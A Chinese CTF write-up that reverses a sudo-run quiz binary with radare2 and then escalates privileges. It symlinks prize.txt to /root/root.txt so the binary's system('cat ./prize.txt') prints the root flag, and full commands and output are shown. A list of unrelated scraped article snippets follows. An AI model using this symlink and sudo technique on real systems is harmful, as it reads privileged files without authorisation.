│           0x004016c2      488d05af0a..   lea rax, str.If_you_get_all_the_questions_right__you_win_a_teddy_bear_and_if_you_dont__you_win_a_teddy_bear_and_if_you_dont__you_win_trash ; 0x402178 ; "If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash"            
│           0x004016c9      488945f0       mov qword [var_10h], rax
│           0x004016cd      488b45f8       mov rax, qword [s]
│           0x004016d1      4889c7         mov rdi, rax                ; const char *s
│           0x004016d4      e8e7f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x004016d9      488b45f0       mov rax, qword [var_10h]
│           0x004016dd      4889c7         mov rdi, rax                ; const char *s
│           0x004016e0      e8dbf9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x004016e5      c745ec0000..   mov dword [var_14h], 0
│           0x004016ec      b800000000     mov eax, 0
│           0x004016f1      e80ffdffff     call sym.question_1
│           0x004016f6      0145ec         add dword [var_14h], eax
│           0x004016f9      b800000000     mov eax, 0
│           0x004016fe      e87bfdffff     call sym.question_2
│           0x00401703      0145ec         add dword [var_14h], eax
│           0x00401706      b800000000     mov eax, 0
│           0x0040170b      e834feffff     call sym.question_3
│           0x00401710      0145ec         add dword [var_14h], eax
│           0x00401713      8b55ec         mov edx, dword [var_14h]
│           0x00401716      488d45e0       lea rax, [var_20h]
│           0x0040171a      89d6           mov esi, edx                ; int64_t arg2
│           0x0040171c      4889c7         mov rdi, rax                ; char *arg1
│           0x0040171f      e8befeffff     call sym.writeResults
│           0x00401724      837dec03       cmp dword [var_14h], 3
│       ┌─< 0x00401728      750a           jne 0x401734
│       │   0x0040172a      8b45ec         mov eax, dword [var_14h]
│       │   0x0040172d      89c7           mov edi, eax                ; int64_t arg1
│       │   0x0040172f      e802fbffff     call sym.print_prize
│       │   ; CODE XREF from main @ 0x401728(x)
│       └─> 0x00401734      8b0542290000   mov eax, dword [obj.foo]    ; [0x40407c:4]=0
│           0x0040173a      83f855         cmp eax, 0x55               ; 'U' ; 85
│       ┌─< 0x0040173d      750a           jne 0x401749
│       │   0x0040173f      b800000000     mov eax, 0
│       │   0x00401744      e88cfeffff     call sym.wait_what
│       │   ; CODE XREF from main @ 0x40173d(x)
│       └─> 0x00401749      b800000000     mov eax, 0
│           0x0040174e      c9             leave
└           0x0040174f      c3             ret

[0x0040168f]> pdc @main
int main (int rdi, int rsi) {
    loc_0x40168f:
        // DATA XREF from entry0 @ 0x401168(r)
        endbr
        push  (rbp)
        rbp = rsp
        rsp -= 0x30
        dword [var_24h] = edi // argc
        qword [var_30h] = rsi // argv
        rax = 0x2e73746c75736572 // 'results.'
        qword [var_20h] = rax
        dword [var_18h] = 0x747874 // 'txt'
        rax = rip + str.Hey_guys__I_have_prepared_this_little_program_to_find_out_how_much_you_know_about_me__since_I_have_been_your_administrator_for_2_years. // 0x4020f0 // "Hey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years."                        
        qword [s] = rax
        rax = rip + str.If_you_get_all_the_questions_right__you_win_a_teddy_bear_and_if_you_dont__you_win_a_teddy_bear_and_if_you_dont__you_win_trash // 0x402178 // "If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash"
        qword [var_10h] = rax
        rax = qword [s] // "Hey guys, I have prepared this little program to find out how m" str.Hey_guys__I_have_prepared_this_little_program_to_find_out_how_much_you_know_about_me__since_I_have_been_your_administrator_for_2_years.                                                                                                        
        rdi = rax     // const char *s // "Hey guys, I have prepared this little program to find out how m" str.Hey_guys__I_have_prepared_this_little_program_to_find_out_how_much_you_know_about_me__since_I_have_been_your_administrator_for_2_years.                                                                                         
        sym.imp.puts  ()
        // int puts("Hey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years.")
        rax = qword [var_10h] // "If you get all the questions right, you win a teddy bear and if" str.If_you_get_all_the_questions_right__you_win_a_teddy_bear_and_if_you_dont__you_win_a_teddy_bear_and_if_you_dont__you_win_trash                                                                                                            
        rdi = rax     // const char *s // "If you get all the questions right, you win a teddy bear and if" str.If_you_get_all_the_questions_right__you_win_a_teddy_bear_and_if_you_dont__you_win_a_teddy_bear_and_if_you_dont__you_win_trash                                                                                                   
        sym.imp.puts  ()
        // int puts("If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash")
        dword [var_14h] = 0
        eax = 0
        sym.question_1  ()
        dword [var_14h] += eax
        eax = 0
        sym.question_2  ()
        dword [var_14h] += eax
        eax = 0
        sym.question_3  ()
        dword [var_14h] += eax
        edx = dword [var_14h]
        rax = var_20h // "results.txt"
        esi = edx     // int64_t arg2
        rdi = rax     // char *arg1 // "results.txt"
        sym.writeResults  () // sym.writeResults(0x177fd8, 0x0)
        var = dword [var_14h] - 3
        if  (var) goto loc_0x401734 // likely
        goto loc_0x40172a
    loc_0x401734:
        // CODE XREF from main @ 0x401728(x)
        eax = dword [obj.foo] // [0x40407c:4]=0
        var = eax - 0x55 // 'U' // 85
        if  (var) goto loc_0x401749 // likely
        goto loc_0x40173f
    loc_0x401749:
        // CODE XREF from main @ 0x40173d(x)
        eax = 0
        =             // rsp
        r
        goto loc_0x401749
         // } else {
        goto loc_0x401734
        }
        return rax;
}

1、将 result和txt都存放在rax寄存器内!

2、0x004016b7 和 0x004016c2地址通过调用lea 指令来加载字符串的地址到寄存器rax中,然后通过mov指令将寄存器中的地址值存储到相应的内存位置。
这里他把这两个字符换的变量存到了s变量指定的内存里面!

3、程序在运行的过程中会提问三个问题! 也就是 question_1、question_2、question_3

4、如果所有的问题都答对了,就直接查看当前目录下的prize.txt文件!

question_1
[0x0040147e]> s sym.question_1
[0x00401405]> pdc@sym.question_1
int sym.question_1 (int rdi, int rsi) {
    loc_0x401405:
        // CALL XREF from main @ 0x4016f1(x)
        endbr
        push  (rbp)
        rbp = rsp
        rsp -= 0x70
        rax = rip + str.What_is_my_favorite_OS_ // 0x40201e // "What is my favorite OS?"
        rdi = rax     // const char *s // "What is my favorite OS?" str.What_is_my_favorite_OS_
        sym.imp.puts  ()
        // int puts("What is my favorite OS?")
        rdx = qword [obj.stdin] // obj.__TMC_END__
        // [0x404070:8]=0 // FILE *stream
        rax = s1
        esi = 0xc8    // 200 // int size
        rdi = rax     // char *s
        sym.imp.fgets  ()
        // char *fgets("", -1, ?)
        rax = s1
        rdx = rip + str.linux_n // 0x402036 // "linux\n"
        rsi = rdx     // const char *s2 // "linux\n" str.linux_n
        rdi = rax     // const char *s1
        sym.imp.strcmp  ()
        // int strcmp("", "linux\n")
        var = eax & eax
        if  (var) goto loc_0x401468 // likely
        goto loc_0x401452
    loc_0x401468:
        // CODE XREF from sym.question_1 @ 0x401450(x)
        rax = rip + str.Nope__ // 0x402047 // "Nope!!"
        rdi = rax     // const char *s // "Nope!!" str.Nope__
        sym.imp.puts  ()
        // int puts("Nope!!")
        eax = 0
        goto loc_0x40147c
        do {
    loc_0x40147c:
        // CODE XREF from sym.question_1 @ 0x401466(x)
        =             // rsp
        r
         // } while (?);
         // } while (?);
        goto loc_0x40147c
        }
        return rax;
}
[0x00401405]> 

问题一: What is my favorite OS?
通过分析伪代码,答案就是 Linux!


question_2
[0x00401405]> pdc@sym.question_2
int sym.question_2 (int rdi, int rsi) {
    loc_0x40147e:
        // CALL XREF from main @ 0x4016fe(x)
        endbr
        push  (rbp)
        rbp = rsp
        rsp += 0xffffffffffffff80
        rax = rip + str.What_is_my_favorite_food_ // 0x40204e // "What is my favorite food?"
        rdi = rax     // const char *s // "What is my favorite food?" str.What_is_my_favorite_food_
        sym.imp.puts  ()
        // int puts("What is my favorite food?")
        rdx = qword [obj.stdin] // obj.__TMC_END__
        // [0x404070:8]=0 // FILE *stream
        rax = s1
        esi = 0x64    // 'd' // 100 // int size
        rdi = rax     // char *s
        sym.imp.fgets  ()
        // char *fgets("", -1, ?)
        dword [var_4h] = 5
        rax = s1
        rdi = rax     // const char *s
        sym.imp.strlen  ()
        // size_t strlen("")
        qword [var_10h] = rax
        var = qword [var_10h] - 0
        if  (!var) goto loc_0x4014ed // unlikely
        goto loc_0x4014cf
    loc_0x4014ed:
        // CODE XREFS from sym.question_2 @ 0x4014cd(x), 0x4014de(x)
        edx = dword [var_4h]
        rax = s1
        esi = edx     // int64_t arg2
        rdi = rax     // int64_t arg1
        sym.secret_q2  () // sym.secret_q2(0x177f80, 0x0)
        rax = s1
        rdx = rip + str.gfhts_ufshfpjx // 0x402068 // "gfhts ufshfpjx"
        rsi = rdx     // const char *s2 // "gfhts ufshfpjx" str.gfhts_ufshfpjx
        rdi = rax     // const char *s1
        sym.imp.strcmp  ()
        // int strcmp("N\x14@", "gfhts ufshfpjx")
        var = eax & eax
        if  (var) goto loc_0x40152e // likely
        goto loc_0x401518
    loc_0x40152e:
        // CODE XREF from sym.question_2 @ 0x401516(x)
        rax = rip + str.Nope__ // 0x402047 // "Nope!!"
        rdi = rax     // const char *s // "Nope!!" str.Nope__
        sym.imp.puts  ()
        // int puts("Nope!!")
        eax = 0
        goto loc_0x401542
        do {
    loc_0x401542:
        // CODE XREF from sym.question_2 @ 0x40152c(x)
        =             // rsp
        r
         // } while (?);
         // } while (?);
        goto loc_0x401542
         // } while (?);
        goto loc_0x4014e0
        }
        return rax;
    loc_0x4014e0:
        rax = qword [var_10h]
        rax -= 1
        byte [rbp + rax - 0x80] = 0
        goto loc_0x4014ed
}
[0x00401405]> pdc@sym.secret_q2
int sym.secret_q2 (int rdi, int rsi) {
    loc_0x401274:
        // CALL XREF from sym.question_2 @ 0x4014f9(x)
        endbr
        push  (rbp)
        rbp = rsp
        qword [var_18h] = rdi // arg1
        dword [var_1ch] = esi // arg2
        dword [var_4h] = 0
        goto loc_0x401385
        goto loc_0x401385
        do {
    loc_0x401385:
        // CODE XREF from sym.secret_q2 @ 0x40128a(x)
        eax = dword [var_4h]
        rdx = eax
        rax = qword [var_18h]
        rax += rdx
        eax = byte [rax]
        var = al & al
        if  (var) goto loc_0x40128f // likely
        goto loc_0x40139d
         // } while (?);
        goto loc_0x40139d
        }
        return rax;
    loc_0x40139d:
        n
        n
        rbp = pop  ()
        r
        }
        return rax;
    loc_0x004012a3:  // orphan
             eax = dword [var_4h]
             rdx = eax
             rax = qword [var_18h]
             rax += rdx
             eax = byte [rax]
             var = al - 0x7a          // 'z' // 122
             if  (var > 0) goto loc_loc_0x401309 // unlikely
    loc_0x004012b7:  // orphan
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         eax = byte [rax]
         eax = al
         edx = rax - 0x61
         eax = dword [var_1ch]
         eax += edx
         rdx = eax
         rdx = rdx * 0x4ec4ec4f
         rdx >>>= 0x20
         edx >>= 3
         ecx = eax
         ecx >>= 0x1f
         edx -= ecx
         ecx = edx * 0x1a
         eax -= ecx
         edx = eax
         eax = edx
         ecx = rax + 0x61
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         edx = ecx
         byte [rax] = dl
         goto loc_loc_0x401381
    loc_0x00401309:  // orphan
         // CODE XREFS from sym.secret_q2 @ 0x4012a1(x), 0x4012b5(x)
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         eax = byte [rax]
         var = al - 0x40          // elf_phdr
         if  (var <= 0) goto loc_loc_0x401381 // unlikely
    loc_0x0040131d:  // orphan
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         eax = byte [rax]
         var = al - 0x5a          // 'Z' // 90
         if  (var > 0) goto loc_loc_0x401381 // likely
    loc_0x00401331:  // orphan
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         eax = byte [rax]
         eax = al
         edx = rax - 0x41
         eax = dword [var_1ch]
         eax += edx
         rdx = eax
         rdx = rdx * 0x4ec4ec4f
         rdx >>>= 0x20
         edx >>= 3
         ecx = eax
         ecx >>= 0x1f
         edx -= ecx
         ecx = edx * 0x1a
         eax -= ecx
         edx = eax
         eax = edx
         ecx = rax + 0x41
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         edx = ecx
         byte [rax] = dl
    loc_0x00401381:  // orphan
         // CODE XREFS from sym.secret_q2 @ 0x401307(x), 0x40131b(x), 0x40132f(x)
         dword [var_4h] += 1
}

# 这个函数主要就是处理问题2的 那个字符串的!
问题二呢,给了一个字符串 gfhts ufshfpjx

打了这么多年ctf,直觉告诉我,这是某种加密!

bacon pancakes  (培根煎饼)

虽然我英语不行,但是我还是能看出来他是一个正常的短语的!

第二个问题也回答正确!


question_3
[0x00401405]> pdc@sym.question_3
int sym.question_3 (int rdi, int rsi) {
    loc_0x401544:
        // CALL XREF from main @ 0x40170b(x)
        endbr
        push  (rbp)
        rbp = rsp
        rsp -= 0x70
        rax = rip + str.What_is_my_favorite_text_editor_ // 0x402078 // "What is my favorite text editor?"
        rdi = rax     // const char *s // "What is my favorite text editor?" str.What_is_my_favorite_text_editor_
        sym.imp.puts  ()
        // int puts("What is my favorite text editor?")
        rdx = qword [obj.stdin] // obj.__TMC_END__
        // [0x404070:8]=0 // FILE *stream
        rax = s1
        esi = 0x64    // 'd' // 100 // int size
        rdi = rax     // char *s
        sym.imp.fgets  ()
        // char *fgets("", -1, ?)
        dword [var_4h] = 6
        edx = dword [var_4h]
        rax = s1
        esi = edx     // int64_t arg2
        rdi = rax     // int64_t arg1
        sym.secret_q3  () // sym.secret_q3(0x177f88, 0x6)
        rax = s1
        rdx = rip + str.hpokqornvjsaohu_n // 0x402099 // "hpok&qorn&vjsaohu\n"
        rsi = rdx     // const char *s2 // "hpok&qorn&vjsaohu\n" str.hpokqornvjsaohu_n
        rdi = rax     // const char *s1
        sym.imp.strcmp  ()
        // int strcmp("", "hpok&qorn&vjsaohu\n")
        var = eax & eax
        if  (var) goto loc_0x4015bf // likely
        goto loc_0x4015a9
    loc_0x4015bf:
        // CODE XREF from sym.question_3 @ 0x4015a7(x)
        rax = rip + str.Nope__ // 0x402047 // "Nope!!"
        rdi = rax     // const char *s // "Nope!!" str.Nope__
        sym.imp.puts  ()
        // int puts("Nope!!")
        eax = 0
        goto loc_0x4015d3
        do {
    loc_0x4015d3:
        // CODE XREF from sym.question_3 @ 0x4015bd(x)
        =             // rsp
        r
         // } while (?);
         // } while (?);
        goto loc_0x4015d3
        }
        return rax;
}
[0x00401405]> pdc@sym.secret_q3
int sym.secret_q3 (int rdi, int rsi) {
    loc_0x4013a1:
        // CALL XREF from sym.question_3 @ 0x40158a(x)
        endbr
        push  (rbp)
        rbp = rsp
        rsp -= 0x20
        qword [s] = rdi // arg1
        dword [var_1ch] = esi // arg2
        rax = qword [s]
        rdi = rax     // const char *s
        sym.imp.strlen  ()
        // size_t strlen(-1)
        dword [var_8h] = eax
        dword [var_4h] = 0
        goto loc_0x4013f6
        goto loc_0x4013f6
        do {
    loc_0x4013f6:
        // CODE XREF from sym.secret_q3 @ 0x4013ca(x)
        eax = dword [var_8h] // rsp
        eax -= 1
        var = dword [var_4h] - eax
        jl 0x4013cc   // likely
        goto loc_0x401401
         // } while (?);
        goto loc_0x401401
        }
        return rax;
    loc_0x401401:
        n
        n
        =             // rsp
        r
        }
        return rax;
}
字符串 : hpok&qorn&vjsaohu

通过查看 问题三中 hpok&qorn&vjsaohu 字符串的处理方法

函数接受两个参数 rdi 和 rsi,其中 rdi 被存储在 [s] 中,rsi 被存储在 [var_1ch] 中。

函数通过调用 strlen 函数来获取参数 s 所指向字符串的长度,并将结果保存在 [var_8h] 中。

接下来是一个循环,循环条件是 [var_4h] 小于字符串长度减一,这里使用了 jl(jump if less)指令,表示循环条件成立时跳转到指定位置。


所以说,这个就是个简单的异或加密!

答案就是:nvim with plugins


prize.txt
[0x00401405]> pdc@sym.print_prize
int sym.print_prize (int rdi, int rsi) {
    loc_0x401236:
        // CALL XREF from main @ 0x40172f(x)
        endbr
        push  (rbp)
        rbp = rsp
        rsp -= 0x20
        dword [var_14h] = edi // arg1
        rax = rip + str.cat_._prize.txt // 0x402008 // "cat ./prize.txt"
        rdi = rax     // const char *string // "cat ./prize.txt" str.cat_._prize.txt
        sym.imp.system  ()
        // int system("cat ./prize.txt")
        dword [var_4h] = eax
        var = dword [var_4h] - 0xffffffff
        if  (var) goto loc_0x401271 // likely
        goto loc_0x40125d
    loc_0x401271:
        // CODE XREF from sym.print_prize @ 0x40125b(x)
        n
        =             // rsp
        r
        goto loc_0x401271
        }
        return rax;
}

当我们三个问题都答对的时候,就会执行这个方法!

也就是查看 当前路径下的 prize.txt文件!


软连接
bacon pancakes

nvim with plugins

我想了一下,既然最后调用的是当前路径下的prize.txt文件,我们就可以在html目录下创建这两个文件 results.txt和prize.txt文件!
然后创建一个软连接指向root/root.txt文件!
最后运行这个可执行程序即可拿到root.txt文件内容!

为什么在html,因为当前用户是www-data啊!

www-data@minimal:/var/www/html$ touch prize.txt
touch prize.txt
www-data@minimal:/var/www/html$ touch results.txt             
touch results.txt
www-data@minimal:/var/www/html$ rm prize.txt;ln -sv /root/root.txt prize.txt
rm prize.txt;ln -sv /root/root.txt prize.txt
'prize.txt' -> '/root/root.txt'
www-data@minimal:/var/www/html$ 

www-data@minimal:/var/www/html$ sudo /opt/quiz/shop
sudo /opt/quiz/shop
Hey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years.
If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash
What is my favorite OS?
Linux
Nope!!
What is my favorite food?
bacon pancakes
Correct!!
What is my favorite text editor?
nvim with plugins
Correct!!
User name: 111
Saving results .
HMV{never_gonna_ROP_you_down}


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1666749.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

centos7.9系统安全加固

1、限制用户登陆 vim /etc/hosts.deny&#xff0c;若禁止192.168.0.158对服务器进行ssh的登陆&#xff0c;添加如下内容 sshd : 192.168.0.158 添加完毕后就生效了&#xff0c;直接用192.168.0.158访问主机&#xff0c;就无法连接了&#xff0c;显示 Connection closing...Soc…

pycharm报错Process finished with exit code -1073740791 (0xC0000409)

pycharm报错Process finished with exit code -1073740791 (0xC0000409) 各种垃圾文章&#xff08;包括chatgpt产生的垃圾文章&#xff09;&#xff0c;没有给出具体的解决办法。 解决办法就是把具体报错信息显示出来&#xff0c;然后再去查。 勾选 然后再运行就能把错误显示…

图像分割各种算子算法-可直接使用(Canny、Roberts、Sobel)

Canny算子&#xff1a; import numpy as np import cv2 as cv from matplotlib import pyplot as pltimg cv.imread("../test_1_1.png") edges cv.Canny(img, 100, 200)plt.subplot(121),plt.imshow(img,cmap gray) plt.title(Original Image), plt.xticks([]), …

vue2+swiper——实现多图轮播+层叠轮播——技能提升

今天看到同事在写轮播图&#xff0c;由于是jq的写法&#xff0c;我没有过多参与&#xff0c;我只写vue的部分。。。虽然语言不一样&#xff0c;但是用法还是要会的。下面介绍通过swiper组件来实现轮播效果。 解决步骤1&#xff1a;安装swiper npm install swiper5.4.5 我这边…

数据分享—全国分省河流水系

河流水系数据是日常研究中必备的数据之一&#xff0c;本期推文主要分享全国分省份的水系和河流数据&#xff0c;梧桐君会不定期的更新数据&#xff0c;欢迎长期订阅。 数据预览 山东省河流水系 吉林省河流水系 四川省河流水系 数据获取方式 链接&#xff1a;https://pan.baidu.…

基于阿里云向量检索 Milvus 版与 PAI 搭建高效的检索增强生成(RAG)系统

阿里云向量检索 Milvus 版现已无缝集成于阿里云 PAI 平台&#xff0c;一站式赋能用户构建高性能的检索增强生成&#xff08;RAG&#xff09;系统。您可以利用 Milvus 作为向量数据的实时存储与检索核心&#xff0c;高效结合 PAI 和 LangChain 技术栈&#xff0c;实现从理论到实…

网络基础(三)——网络层

目录 IP协议 1、基本概念 2、协议头格式 2.1、报头和载荷如何有效分离 2.2、如果超过了MAC的规定&#xff0c;IP应该如何做呢&#xff1f; 2.3、分片会有什么影响 3、网段划分 4、特殊的ip地址 5、ip地址的数量限制 6、私有ip地址和公网ip地址 7、路由 IP协议 网络…

LINUX 精通 1——2.1.1 网络io与io多路复用select/poll/epoll

LINUX 精通 1 day12 20240509 算法刷题&#xff1a; 2道高精度 耗时 107min 课程补20240430 耗时&#xff1a;99 min day 13 20240512 耗时&#xff1a;200min 课程链接地址 前言 杂 工作5-10年 够用 费曼&#xff1a;不要直接抄&#xff0c;自己写&#xff1b;不要一个…

【微服务】spring aop实现接口参数变更前后对比和日志记录

目录 一、前言 二、spring aop概述 2.1 什么是spring aop 2.2 spring aop特点 2.3 spring aop应用场景 三、spring aop处理通用日志场景 3.1 系统日志类型 3.2 微服务场景下通用日志记录解决方案 3.2.1 手动记录 3.2.2 异步队列es 3.2.3 使用过滤器或拦截器 3.2.4 使…

安全工程师面试题

安全工程师面试题安全工程师是一个非常重要的职位&#xff0c;他们负责保护公司的网络和系统免受黑客和恶意软件的攻击。如果你想成为一名安全工程师&#xff0c;那么你需要准备好面试。下面是一… 1安全工程师面试题 安全工程师是一个非常重要的职位&#xff0c;他们负责保护…

【全开源】Java俱乐部系统社区论坛商城系统源码-奔驰奥迪保时捷大众宝马等汽车俱乐部

特色功能&#xff1a; 会员中心&#xff1a;会员中心可以帮助企业更好地管理客户&#xff0c;包括设置积分商城、会员卡充值、个人汽车档案等功能&#xff0c;对不同的会员群体展开有针对性的营销&#xff0c;并维护和积累自己的粉丝群体。信息服务&#xff1a;负责定期发布新…

后端项目开发笔记

Maven打包与JDK版本不对应解决方法 我这里使用jdk8。 <build><plugins><plugin><groupId>org.apache.maven.plugins</groupId><artifactId>maven-compiler-plugin</artifactId><version>3.8.1</version><configurat…

【Docker】Ubunru下Docker的基本使用方法与常用命令总结

【Docker】docker的基本使用方法 镜像image与容器container的关系基本命令- 查看 Docker 版本- 拉取镜像- 查看系统中的镜像- 删除某个镜像- 列出当前 Docker 主机上的所有容器&#xff0c;包括正在运行的、暂停的、已停止的&#xff0c;以及未运行的容器- 列出当前 Docker 主机…

day05-面向对象内存原理和数组

day05 面向对象内存原理和数组 我们在之前已经学习过创建对象了,那么在底层中他是如何运行的。 1.对象内存图 1.1 Java 内存分配 Java 程序在运行时&#xff0c;需要在内存中分配空间。为了提高运算效率&#xff0c;就对空间进行了不同区域的划分&#xff0c;因为每一片区域…

leetcode——反转链表

206. 反转链表 - 力扣&#xff08;LeetCode&#xff09; 思路&#xff1a;创建三个指针n1,n2,n3&#xff0c;遍历原链表&#xff0c;通过三者之间的关系将链表反转。下面给出图示&#xff1a; 下面给出题解代码&#xff1a; typedef struct ListNode ListNode; struct List…

C++入门指南(上)

目录 ​编辑 一、祖师爷画像 二、什么是C 三、C发展史 四、C在工作领域的应用 1. 操作系统以及大型系统软件开发 2. 服务器端开发 3. 游戏开发 4. 嵌入式和物联网领域 5. 数字图像处理 6. 人工智能 7. 分布式应用 五、如何快速上手C 一、祖师爷画像 本贾尼斯特劳斯…

vmware虚拟机内删除文件后宿主机空间不释放

问题描述 linux下&#xff0c;vmware内虚拟机删除文件&#xff0c;宿主机空间不释放&#xff0c;D盘快满了 解决方法 通过vmware-toolbox进行空间回收 安装 在虚拟机内操作 yum install -y open-vm-tools 清理 在虚拟机内操作 #查看磁盘的挂载点 sudo /usr/bin/vmware…

设计模式-结构型-桥接模式-Bridge

桥接模式可以减少类的创建 矩阵类 public class Matrix {private String fileName;public Matrix(String fileName) {this.fileName fileName;}public String getFileName() {return fileName;} } 图片抽象类 public abstract class Image {protected ImageImp imp;public …

C#二维数组(矩阵)求伴随矩阵和逆矩阵

程序框架及winform窗体 窗体控件: using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks;namespace Matrix {internal class Algorithm_Gallery{// <summary>/// 计算 A[p,q] 位于 [,]temp 的块辅因子…

Oracle数据库之 常用数据库对象(二)

目录 1.视图 1.1.什么是视图&#xff1f; 1.2.创建视图的语法 1.3.简单视图和复杂视图 1.4.创建复杂视图 1.4.1.创建复杂视图的步骤 1.4.2.示例 1.4.3.注意事项 1.5.视图中使用DML的规定 1.5.1.屏蔽DML操作 1.6.删除视图 2.序列 2.1.语法&#xff1a; 2.2.查询序…